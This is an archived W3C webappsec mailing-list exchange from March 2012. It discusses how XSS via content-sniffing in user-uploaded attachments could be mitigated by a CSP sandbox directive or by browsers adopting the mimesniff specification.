W3C home > Mailing lists > Public > public-webappsec@w3.org > March 2012

RE: XSS through content-sniffing: good case for CSP sandbox directive

From: Hill, Brad <bhill@paypal-inc.com>
Date: Tue, 13 Mar 2012 01:06:48 +0000
To: Adam Barth <w3c@adambarth.com>
CC: "public-webappsec@w3.org" <public-webappsec@w3.org>
Message-ID: <370C9BEB4DD6154FA963E2F79ADC6F2E05F3E8@DEN-EXDDA-S12.corp.ebay.com>
Unless it's a content-type with by-design DOM-access. (java, swf, js, pdf, etc.)  This is a really common problem in systems designed to serve attachments and user uploaded content: webmail, bulletin boards, sharepoint, etc.  

> -----Original Message-----
> From: Adam Barth [mailto:w3c@adambarth.com]
> Sent: Monday, March 12, 2012 6:01 PM
> To: Hill, Brad
> Cc: public-webappsec@w3.org
> Subject: Re: XSS through content-sniffing: good case for CSP sandbox
> directive
> 
> On Mon, Mar 12, 2012 at 5:54 PM, Hill, Brad <bhill@paypal-inc.com> wrote:
> > http://www.garage4hackers.com/f11/gmail-xss-vulnerability-through-cont
> > ent-sniffing-2094.html?postcount=1
> >
> > A good example of the type of bug we could reduce the impact of with a
> > sandbox directive in CSP.
> 
> Or IE could just implement http://mimesniff.spec.whatwg.org/ and avoid all
> these vulnerabilities.
> 
> Adam
Received on Tuesday, 13 March 2012 01:07:19 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Tuesday, 13 March 2012 01:07:19 GMT